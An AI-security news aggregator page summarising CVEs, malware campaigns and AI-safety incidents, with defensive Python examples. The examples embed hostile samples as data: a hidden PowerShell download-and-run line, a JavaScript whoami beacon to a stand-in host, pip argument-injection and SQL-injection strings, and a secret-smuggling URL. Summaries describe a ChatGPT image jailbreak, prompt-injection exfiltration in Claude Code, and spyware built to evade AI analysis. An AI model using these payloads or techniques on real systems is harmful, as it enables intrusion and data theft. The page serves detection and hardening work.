aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

6085 items

Attackers abuse Google Ads, GitLab, and Claude to deliver malware

mediumnews
securitysafety
Jun 18, 2026

Attackers are exploiting trusted platforms like Google Ads, GitLab, and Claude to deliver malware by impersonating popular AI developer tools and using ClickFix social engineering attacks (tricking users into manually running malicious commands). Over a seven-week campaign, threat actors created fake pages on legitimate services and used Google Ads to direct more than 2,000 victims to malicious sites where they were convinced to copy and paste harmful PowerShell or terminal commands (code that executes instructions). The campaign succeeded because victims trusted these platforms and assumed instructions from AI tools were reliable, making the attacks harder to detect than traditional malware campaigns.

CSO Online
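The campaign above works because the victim, not the malware, launches the first stage: a pasted one-liner runs under the user's own shell. The detection below is an added example written for this page, not code from the CSO Online article or from any vendor; it scores process-creation events for the pasted download-and-run pattern. The events are constructed (field names mostly follow Sysmon Event ID 1; the RecordId field and all values are made up), and the indicator list is generic ClickFix tradecraft, not specifics from the campaign.

```python
import re

# Indicators typical of pasted download-and-run one-liners; regexes are
# applied to the full command line, case-insensitively.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I),
    "downloader": re.compile(
        r"\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I
    ),
    "eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
}
# The Run dialog and a freshly opened terminal spawn the shell under an
# interactive parent; scheduled tasks, services and IDEs generally do not.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> dict:
    """Return the indicators hit by one event and whether it should alert."""
    cmd = event.get("CommandLine", "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    interactive = image in SHELLS and parent in INTERACTIVE_PARENTS
    # two indicators under an interactive parent, or three from anywhere
    alert = (interactive and len(hits) >= 2) or len(hits) >= 3
    return {"id": event.get("RecordId"), "hits": hits, "interactive": interactive, "alert": alert}


def detect(events) -> list[str]:
    """RecordIds of the events that cross the alert threshold."""
    return [r["id"] for r in map(score_event, events) if r["alert"]]


# Constructed events (hypothetical RecordId field; Sysmon-style names otherwise).
EVENTS = [
    {"RecordId": "evt-1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/verify.txt)"'},
    {"RecordId": "evt-2", "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"RecordId": "evt-3", "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "Invoke-WebRequest https://example.invalid/sdk.zip -OutFile sdk.zip"'},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(score_event(ev))
    print("alerts:", detect(EVENTS))
```

Only evt-1 alerts: it is a shell spawned by explorer.exe (the Run dialog path) with four indicators. The developer's Invoke-WebRequest in evt-3 hits one indicator under a non-interactive parent and stays quiet, which is the trade-off to tune in your own environment.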

Embedding Forbidden Text in Spyware to Discourage AI Analysis

medium · news
security · safety
Jun 18, 2026

A malware developer is embedding forbidden text about nuclear and biological weapons in JavaScript spyware to discourage AI analysis. The malware places the real code after a large comment block containing policy-triggering content, so that AI systems either refuse to analyze the file or lose track of the task before they reach the actual malicious code.

Schneier on Security

Improving health intelligence in ChatGPT

info · news
safety · research
Jun 18, 2026

ChatGPT has improved its ability to help with health questions through a new model called GPT-5.5 Instant, which better recognizes when urgent care is needed, explains uncertainty honestly, and provides clearer information. The improvements were measured using physician-led evaluations (HealthBench, a set of tests that assess health response quality) and real-world usage data, showing a 71% reduction in factuality issues over two months. GPT-5.5 Instant is available free to all ChatGPT users and performs similarly to OpenAI's most advanced models on health-related tasks.

OpenAI Blog

New CISO appointments 2026

info · news
industry
Jun 18, 2026

This article reports on several high-level security hiring announcements in 2026, where companies are appointing CISOs (chief information security officers, executives responsible for protecting a company's information systems). The appointments reflect companies' growing focus on security as threats evolve, with new leaders coming from military backgrounds, previous CISO roles, and security-focused companies.

CSO Online

5 new security operations roles the AI-SOC will create

info · news
industry
Jun 18, 2026

AI-powered security operations centers (SOCs, where cybersecurity teams monitor and respond to threats) are automating many traditional analyst tasks, starting with alert triage and investigation. This shift will create new job roles such as security data engineers, AI security agent orchestrators, and AI model trainers, where humans focus on preparing data, managing AI agent systems, and continuously updating AI models rather than on routine alert monitoring.

CSO Online

Cybersecurity was built for predictable systems. AI changes the rules

info · news
security · safety
Jun 18, 2026

AI systems challenge traditional cybersecurity because they behave unpredictably, unlike the deterministic (consistent and predictable) systems that security programs were designed around. Traditional security approaches focused on preventing attacks before systems go live, but AI agents make dynamic decisions and interact with external tools in ways developers cannot fully predict, meaning security risks emerge at runtime (while systems are actively running) rather than being preventable beforehand. Additionally, AI-assisted development tools are accelerating code production, compressing the time security teams have to review and understand what enters production.

CSO Online

Using AI to help physicians diagnose rare genetic diseases affecting children

info · research · Peer-Reviewed
research
Jun 18, 2026

Researchers used OpenAI o3 Deep Research, an AI reasoning model, to re-analyze 376 previously unsolved rare genetic disease cases by connecting clinical data, genetic variants, and scientific literature into evidence-based explanations for human experts to review. After specialist evaluation and clinical confirmation, the AI-assisted workflow helped establish new diagnoses in 18 cases (4.8% additional diagnostic yield), with the model generating hypotheses rather than making medical decisions itself. This demonstrates how periodic AI-assisted reanalysis could help scale the process of solving rare disease cases as medical knowledge evolves.

OpenAI Blog

EU Gets a Head Start in Developing 6G Network Security

info · news
security
Jun 18, 2026

The EU is developing 'Shield-6G', a security framework that uses AI threat detection (automated systems that recognize harmful activity), digital twins (virtual copies of networks used for testing), and honeypots (fake systems designed to catch attackers) to help telecommunications carriers protect next-generation 6G networks from future threats.

Dark Reading

Google Gemini co-lead Noam Shazeer leaves for OpenAI

info · news
industry
Jun 17, 2026

Noam Shazeer, a senior Google engineer and co-lead of the Gemini AI models (Google's large language model system), has left the company to join OpenAI (the company behind ChatGPT). This departure highlights the competitive battle between tech companies to recruit top AI researchers and engineers.

CNBC Technology

Midjourney goes from generating cat images to full-body ultrasound scans

info · news
industry
Jun 17, 2026

Midjourney, known for its AI image generator, has unveiled The Midjourney Scanner, a hardware product that uses ultrasound technology (sound waves to create images of the body's interior) with a ring of sensors to capture full-body scans showing muscle, fat, bone, and organs. The company plans to build a spa in San Francisco where users could get these scans, which the CEO claims could match MRI (magnetic resonance imaging, a medical scanning technique) quality.

The Verge (AI)

Leak confirms OpenAI is testing a ChatGPT for Science subscription

info · news
industry
Jun 17, 2026

OpenAI is testing a new subscription service called 'ChatGPT for Science' that would provide specialized AI capabilities for scientific research, similar to how it previously created GPT-Rosalind (a specialized model built on the GPT-5.5 architecture for life sciences research). The service would likely be restricted to verified research institutions and universities rather than being available to all users, and it is expected to be announced within the coming weeks.

BleepingComputer

CVE-2026-20253: Splunk Enterprise Missing Authentication for Critical Function Vulnerability

high · vulnerability
security
Jun 17, 2026
CVE-2026-20253 · Actively Exploited

Splunk Enterprise has a security flaw where an endpoint of the PostgreSQL sidecar service (a supporting service that handles database connections) does not require authentication (proof of identity), allowing an attacker without credentials to create or delete arbitrary files. The vulnerability is being exploited in the wild and is listed in CISA's Known Exploited Vulnerabilities catalog.

CISA Known Exploited Vulnerabilities

GLM-5.2 is probably the most powerful text-only open weights LLM

info · news
industry
Jun 17, 2026

Z.ai released GLM-5.2, a 753-billion parameter text-only open weights LLM (large language model, a type of AI trained on text) under an MIT license on June 16, 2026. It features a 1-million token context window (the amount of text it can consider at once) and ranks as the top open weights model on independent benchmarks, though it uses significantly more output tokens per task than competing models. The model performs well on web development coding tasks but has shown mixed results in creative image generation tasks compared to its predecessor.

Simon Willison's Weblog

ChatGPT can be made to generate sexualised and violent images, researchers find

medium · news
safety · security
Jun 17, 2026

Researchers at AI security startup Mindgard discovered that ChatGPT can be manipulated using modified prompts (instructions given to an AI) to generate graphic images containing violence and sexual content, even when the prompt does not explicitly request such material. After the BBC contacted OpenAI, the company stated it had added safeguards to prevent this, though the researchers found that further small changes to the prompt still produced concerning content.

Fix: OpenAI said it had 'introduced additional safeguards against this type of prompt' and stated it has 'multiple layers of protection to prevent users making content which breaches its terms and conditions.' The company also continues to 'monitor and roll out additional mitigating protections that encourage the model not to generate images in response to the prompt.'

BBC Technology

CVE-2026-12530 - Improper neutralization of argument delimiters in AWS Bedrock AgentCore Python SDK install_packages()

high · vulnerability
security
Jun 17, 2026

A vulnerability (CVE-2026-12530) was found in the install_packages() method of the AWS Bedrock AgentCore Python SDK, which did not neutralize argument delimiters in package names before passing them to the package installer as shell commands. A package name that begins with an option is therefore parsed as one: an attacker who controls package names could pass '--index-url' to redirect package downloads to a server they control, or '-r' to make the installer read a file from the sandbox system. Versions 1.1.3 through 1.6.0 are affected.

AWS Security Bulletins

Beyond the benchmark: Advancing security at AI speed

info · news
security · industry
Jun 17, 2026

Microsoft created MDASH, an AI-powered system that uses multiple specialized AI agents to find and help fix software vulnerabilities (security flaws) automatically across complex systems like Windows and Azure. Rather than waiting for scheduled security reviews, MDASH integrates into developers' existing tools to discover and validate bugs continuously as code is written, giving security teams deeper analysis coverage than manual review alone.

Microsoft Security Blog

GHSA-x223-p2gf-v735: Langflow: Unauthenticated file upload leads to DoS (space exhaustion) and information leak

critical · vulnerability
security
Jun 17, 2026
CVE-2026-55450

Langflow versions before 1.9.1 allow anyone with network access to upload unlimited amounts of data to the server without logging in, which can exhaust disk space and cause the service to stop working (DoS, or denial of service). Additionally, the server reveals the exact file path where uploads are stored, giving attackers information that could help them chain together multiple attacks.

Fix: Upgrade to Langflow version 1.9.1 or later. The fix adds authentication requirements to the upload endpoint (users must log in and own the flow), enforces file size limits (returns HTTP 413 if exceeded), and only reveals file paths to authenticated flow owners.

GitHub Advisory Database

GHSA-2mfg-cc43-9pcj: LangChain4j: SQL injection via metadata filters in langchain4j-mariadb and langchain4j-pgvector

high · vulnerability
security
Jun 17, 2026
CVE-2026-55405

LangChain4j's MariaDB and pgvector embedding stores have a SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL code into a query) caused by improperly escaping metadata filter keys before placing them in SQL queries. An attacker who can control the filter keys in search or remove operations could inject arbitrary SQL to steal data, cause denial of service, or delete rows from the database.

Fix: Fixed in langchain4j-mariadb and langchain4j-pgvector version 1.16.3-beta26. The patch properly escapes JSON filter keys before embedding them in SQL string literals (doubling single quotes for PostgreSQL and escaping backslash and single quote for MariaDB), escapes backslash and single quote in MariaDB string values, and validates or quotes column-mode keys as identifiers instead of concatenating them as raw SQL.

GitHub Advisory Database

Anthropic got hit by export rules nobody understands

info · news
policy
Jun 17, 2026

The Trump administration ordered Anthropic to block access to its AI models (Fable 5 and Mythos 5) for all foreign nationals, citing national security as the reason. This marks the first time US export controls have been used to restrict access to an AI model in this way, and the government has not publicly explained the legal basis for the order.

The Verge (AI)

GHSA-fg94-h982-f3mm: Claude Code: Out-of-Band Data Exfiltration via Pre-Approved HuggingFace Domain in WebFetch

medium · vulnerability
security
Jun 17, 2026
CVE-2026-54316

Claude Code had a security flaw where the domain huggingface.co was automatically approved for the WebFetch tool (a feature that lets the assistant fetch data from the internet). Because that domain also hosts attacker-controlled content, an attacker who could first inject malicious content into Claude's context (the information it is working with) could steer it into making web requests to URLs they control on that domain, with data such as file contents or environment variables smuggled into the request, without the user being prompted for permission. The prerequisite of a successful context injection is what keeps the severity at medium.

Fix: Users on standard Claude Code auto-update have received this fix already; users performing manual updates are advised to update to the latest version.

Hugging Face Security Advisories
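For the "Embedding Forbidden Text in Spyware" item above, the practical countermeasure is to normalize a sample before an LLM-based analyzer sees it. The code below is an added example written for this page, not from the Schneier post or from the spyware it describes: it strips JavaScript comments (copying string literals verbatim so comment markers inside strings survive) and reports how much of the file the comments occupied, which is itself a triage signal. The sample is constructed, with a neutral placeholder in place of the policy-triggering text and a reserved `.invalid` domain in the payload.

```python
def strip_js_comments(src: str) -> str:
    """Drop // and /* */ comments. String literals (', ", `) are copied
    whole, honoring backslash escapes. Regex literals are not told apart
    from division, which is acceptable for triage."""
    out = []
    i, n = 0, len(src)
    while i < n:
        ch = src[i]
        if ch in ('"', "'", "`"):
            j = i + 1
            while j < n and src[j] != ch:
                j += 2 if src[j] == "\\" else 1  # skip escaped characters
            out.append(src[i:j + 1])
            i = j + 1
        elif src.startswith("//", i):
            j = src.find("\n", i)
            i = n if j == -1 else j  # keep the newline itself
        elif src.startswith("/*", i):
            j = src.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def triage_js(src: str, ratio_threshold: float = 0.8) -> dict:
    """Return the comment-free code and the share of the input that was
    comment text. A file that is mostly one comment block and still has
    executable code after it matches the decoy pattern."""
    code = strip_js_comments(src)
    ratio = 1.0 - len(code) / len(src) if src else 0.0
    return {
        "comment_ratio": round(ratio, 3),
        "code": code,
        "suspicious": ratio >= ratio_threshold and bool(code.strip()),
    }


# Constructed sample: a large decoy comment (placeholder text stands in for
# the policy-triggering content) followed by a short collect-and-beacon payload.
DECOY = "/*\n" + "This block is a decoy written to trip content filters.\n" * 200 + "*/\n"
PAYLOAD = (
    "const cp = require('child_process');\n"
    "const u = 'http://example.invalid/beacon'; // the '//' inside the string survives\n"
    "cp.exec('whoami', (e, o) => fetch(u + '?d=' + encodeURIComponent(o)));\n"
)
SAMPLE = DECOY + PAYLOAD

if __name__ == "__main__":
    r = triage_js(SAMPLE)
    print(f"comment ratio {r['comment_ratio']}, suspicious={r['suspicious']}")
    print(r["code"])
```

Feed `r["code"]` to the analyzer instead of the raw file, and log `comment_ratio` alongside the verdict; a sample that is 98% comment with a `child_process` call after it deserves a human look regardless of what the model says.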
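The CVE-2026-12530 item above is an argument-injection bug: a package name that starts with `-` is an option to the installer, and a name with a space or a shell metacharacter is several arguments to the shell. The block below is an added example, not the AWS SDK's code: a helper that mirrors that bug class beside a hardened version that validates each requirement against an allow-list grammar and builds an argv list for `subprocess.run` with no shell. The requirement grammar, the `pip` invocation and the sample package names are assumptions; the `--` terminator is belt and braces and should be confirmed against your pip version.

```python
import re
import shlex

# Loose PEP 508-style requirement: name[extras]version-specifiers and nothing else.
# The first character must be alphanumeric, so option-looking strings never match.
_REQ_RE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._-]*"            # distribution name
    r"(?:\[[A-Za-z0-9._,-]+\])?"              # optional extras, e.g. [crt]
    r"(?:(?:[=<>!~]=?)[A-Za-z0-9.*+!-]+"      # optional version specifier ...
    r"(?:,(?:[=<>!~]=?)[A-Za-z0-9.*+!-]+)*)?$"  # ... with comma-separated clauses
)


def vulnerable_install_cmd(packages: list[str]) -> str:
    """Mirror of the bug class: names joined into one shell string, so
    '--index-url=...' becomes a pip option and '-r /etc/passwd' becomes two
    arguments that make pip read a requirements file from the sandbox."""
    return "pip install " + " ".join(packages)


def shell_view(cmd: str) -> list[str]:
    """The argv a POSIX shell would hand to pip for the string above."""
    return shlex.split(cmd)


def hardened_install_argv(packages: list[str]) -> list[str]:
    """Reject anything outside the requirement grammar, then build an argv
    list to run with subprocess.run(argv, check=True) and no shell."""
    bad = [p for p in packages if not _REQ_RE.fullmatch(p)]
    if bad:
        raise ValueError(f"rejected package specs: {bad!r}")
    return ["pip", "install", "--no-input", "--", *packages]


if __name__ == "__main__":
    attacker = ["requests", "--index-url=http://pypi.example.invalid/simple", "-r /etc/passwd"]
    print("vulnerable argv:", shell_view(vulnerable_install_cmd(attacker)))
    try:
        hardened_install_argv(attacker)
    except ValueError as e:
        print("hardened:", e)
    print("hardened argv:", hardened_install_argv(["requests>=2.31,<3", "boto3[crt]==1.34.0"]))
```

The validation step is the real fix; the argv list and `--` only close the remaining shell and option-parsing gaps. Resolving names against a pinned, private index (rather than trusting whatever `--index-url` says) belongs in the installer configuration, not in the caller.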
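The LangChain4j advisory above describes two injection surfaces in a metadata filter: a JSON mode, where the key lands inside a SQL string literal (the JSON path), and a column mode, where the key is an identifier. The block below is an added example written for this page, not LangChain4j's code: a vulnerable JSON-mode filter beside hardened JSON- and column-mode versions, run against a constructed SQLite store (`json_extract` plays the role of the PostgreSQL and MariaDB JSON operators). The table layout, key grammar and sample rows are assumptions.

```python
import re
import sqlite3

_KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")  # assumed allow-list for metadata keys


def setup_store() -> sqlite3.Connection:
    """Constructed embedding store: a JSON metadata column (JSON mode) and a
    plain column (column mode)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE embeddings (id INTEGER PRIMARY KEY, tenant TEXT, metadata TEXT)")
    con.executemany(
        "INSERT INTO embeddings (tenant, metadata) VALUES (?, ?)",
        [("acme", '{"tenant": "acme"}'), ("globex", '{"tenant": "globex"}'), ("acme", '{"tenant": "acme"}')],
    )
    return con


def vulnerable_filter_ids(con, key: str, value: str) -> list[int]:
    """Bug pattern: the key is spliced into the JSON-path literal, and the
    value into another literal, with no escaping."""
    sql = f"SELECT id FROM embeddings WHERE json_extract(metadata, '$.{key}') = '{value}' ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def sql_string(s: str) -> str:
    """Single-quoted literal with quotes doubled (the PostgreSQL rule; the
    advisory notes MariaDB additionally needs backslashes escaped)."""
    return "'" + s.replace("'", "''") + "'"


def hardened_filter_ids(con, key: str, value: str) -> list[int]:
    """Allow-list the key, escape it anyway, and bind the value."""
    if not _KEY_RE.fullmatch(key):
        raise ValueError(f"invalid metadata key {key!r}")
    sql = f"SELECT id FROM embeddings WHERE json_extract(metadata, {sql_string('$.' + key)}) = ? ORDER BY id"
    return [row[0] for row in con.execute(sql, (value,))]


def quote_identifier(name: str) -> str:
    """Column mode: the key is an identifier, so quote it as one (double
    quotes doubled) instead of concatenating raw SQL."""
    return '"' + name.replace('"', '""') + '"'


def column_filter_ids(con, column: str, value: str) -> list[int]:
    sql = f"SELECT id FROM embeddings WHERE {quote_identifier(column)} = ? ORDER BY id"
    return [row[0] for row in con.execute(sql, (value,))]


# Closes the json_extract() call early, appends a tautology, comments out the rest.
INJECTED_KEY = "tenant') IS NOT NULL OR 1=1 --"

if __name__ == "__main__":
    con = setup_store()
    print("legit:", vulnerable_filter_ids(con, "tenant", "acme"))
    print("injected:", vulnerable_filter_ids(con, INJECTED_KEY, "nobody"))  # every row
    try:
        hardened_filter_ids(con, INJECTED_KEY, "nobody")
    except ValueError as e:
        print("hardened:", e)
```

With the injected key the vulnerable search returns every row for a value that matches nothing; the same key in a remove operation built the same way would become `DELETE ... WHERE ... OR 1=1`, which is the data-loss case the advisory names. The hardened column-mode filter turns a malicious column name into an ordinary "no such column" error rather than executing it.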
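The Claude Code advisory above is a reminder that a domain allow-list for an agent's fetch tool is only as safe as the least trusted content on that domain. The block below is an added example written for this page, not Claude Code's own WebFetch policy: a gate that allow-lists host-and-path-prefix pairs rather than bare hosts, refuses query strings and fragments on allow-listed hosts, and refuses any URL that carries a known secret in plain, base64, URL-safe base64 or hex form. The `/api/models/` prefix, the reserved `.invalid` domain and the sample secrets are assumptions.

```python
import base64
from urllib.parse import unquote, urlsplit

# Hypothetical allow-list: (host, path prefix) pairs, so user-uploaded content
# elsewhere on the same host is not automatically reachable.
ALLOWED = (("huggingface.co", "/api/models/"),)


def url_allowed(url: str, allow=ALLOWED) -> tuple[bool, str]:
    """Allow-list decision plus the reason, for logging."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, "scheme"
    if parts.username is not None or parts.port is not None:
        return False, "userinfo-or-port"
    host = (parts.hostname or "").lower()
    if not any(host == h and parts.path.startswith(p) for h, p in allow):
        return False, "not-allow-listed"
    if parts.query or parts.fragment:
        return False, "query-or-fragment"  # the easiest place to smuggle data
    return True, "ok"


def encode_variants(secret: str) -> set[str]:
    """The forms a model is most likely to be told to encode a secret in."""
    raw = secret.encode()
    return {
        secret,
        base64.b64encode(raw).decode().rstrip("="),
        base64.urlsafe_b64encode(raw).decode().rstrip("="),
        raw.hex(),
    }


def carries_secret(url: str, secrets, min_len: int = 8) -> bool:
    """True if the raw or percent-decoded URL contains any known secret.
    Only whole-secret embeddings are caught; chunked or compressed exfil
    needs a different control (for example an egress byte budget)."""
    haystacks = (url, unquote(url))
    for s in secrets:
        if len(s) < min_len:
            continue
        if any(v in h for v in encode_variants(s) for h in haystacks):
            return True
    return False


def gate_fetch(url: str, secrets) -> tuple[str, str]:
    """Decision for one tool call: allow, deny, or fall back to asking the user."""
    ok, why = url_allowed(url)
    if not ok:
        return "ask-user", why
    if carries_secret(url, secrets):
        return "deny", "secret-in-url"
    return "allow", "ok"


# Constructed secrets; in practice take them from the environment and credential files.
SAMPLE_SECRETS = ["hunter2-super-secret", "AKIAIOSFODNN7EXAMPLE"]

if __name__ == "__main__":
    leaked = base64.b64encode(b"hunter2-super-secret").decode().rstrip("=")
    for u in (
        "https://huggingface.co/api/models/example-org/example-model",
        "https://huggingface.co/datasets/attacker/x/raw/main/f.txt?d=" + leaked,
        "https://huggingface.co/api/models/attacker/" + leaked,
    ):
        print(gate_fetch(u, SAMPLE_SECRETS), u)
```

The third URL is the instructive one: it is inside the allow-listed prefix and has no query string, so only the secret check stops it. Everything outside the allow-list falls back to the per-request confirmation the advisory says was bypassed.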